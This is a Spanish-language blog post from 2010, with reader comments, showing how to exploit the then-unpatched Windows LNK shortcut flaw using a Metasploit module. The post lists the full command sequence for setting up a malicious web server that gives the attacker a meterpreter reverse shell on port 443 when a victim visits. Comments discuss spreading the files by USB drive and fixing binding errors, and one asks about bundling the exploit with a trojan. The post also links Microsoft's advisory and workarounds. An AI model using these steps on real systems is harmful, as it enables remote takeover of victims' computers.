miércoles, 21 de julio de 2010

Explotando "LNK" con MetaSploit

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:

- Microsoft Security Advisory (2286198)
- Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software

Publicado por Leonardo Pigñer en www.KUNGFOOSION.com

12 comentarios:

MAURICIO PARDO dijo...

Pero creo que existe la posibilidad de copiar los archivos a una usb o a una carpeta compartida y tambien funciona !!! si existe un proxy no funciona como explicas !!! nos veremos en DEFCON el 28 de julio :) alla estare mi correo es tinpardo@gmail.com te invito una cerveza alla :)

Anónimo dijo...

Excelente aporte Leo...
falta la manera de copiar los 2 archivos que se generan.

saludos desde mendoza!

Anónimo dijo...

Leo, se pueden copiar los archivos abriendo la UNC desde el mismo BT y de ahi copiarlos al PENDRIVE. funciona de mil... con solo ponerlo levanta.

saludos desde mendoza
bruce

Unknown dijo...

Yo estube probando y me sale esto:
Exploit running as background job.

[-] Handler failed to bind to 190.xxx.xxx.xxx:443
[*] Started reverse handler on 0.0.0.0:443
[*]
[*] Send vulnerable clients to \\190.74.55.198\gXhuYKlx\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[-] Exploit exception: Cannot assign requested address - bind(2)

Leonardo Pigñer dijo...

Gracias a todos por sus comentarios, maniana lo pruebo con el USB ;-)

Hola Jeann,

Primero fijate que efectivamente tenes esa IP publica en tu PC, y no que fuera una IP privada nateada.

Luego que no tengas el puerto 80 o 443 utilizado por otra aplicación.

Tambien que solo estes corriendo una instancia de metasploit.

Saludos,
Leonardo

Unknown dijo...

Genial tu blog, claro e interesante... ahora me pongo a molestar con metasploit.

Anónimo dijo...

va como loco leito, un placer aprender cosas con Ud. todo funciona, es increible!! ;)

Moises!

Anónimo dijo...

va como loco leito, un placer aprender cosas con Ud. todo funciona, es increible!! ;)

Moises!

Franco Di dijo...

hola leo :)
una pregunta, cuando uso este exploit me aparece un mensaje raro.

Sending UNC redirect to 192.168.0.10:9586

los ultimos numeros oscilan entre 9586 y 9584

esto a que se debe ?
PD: La url tambien se modifica gracias :)

Leonardo Pigñer dijo...

Hola Dr [F],

Para explotar esta vuln, metasploit te lleva a una especie de recurso compartido de Windows, en donde vas a ver un archivo. LNK y una DLL con el payload. Cuando pasa eso, se deberia ejecutar.

A mi me funciono perfecto en redes LAN, pero en Internet no lo pude hacer funcionar, seguramente a causa de esto del recurso compartido.

Saludos!

Anónimo dijo...

me parece q ya no esta disponible este exploit, puede ser?

Anónimo dijo...

sera posible juntar este exploit con un troyano y asi se puede alguien seria tan amable de explicarmelo gracias ;)

LinkWithin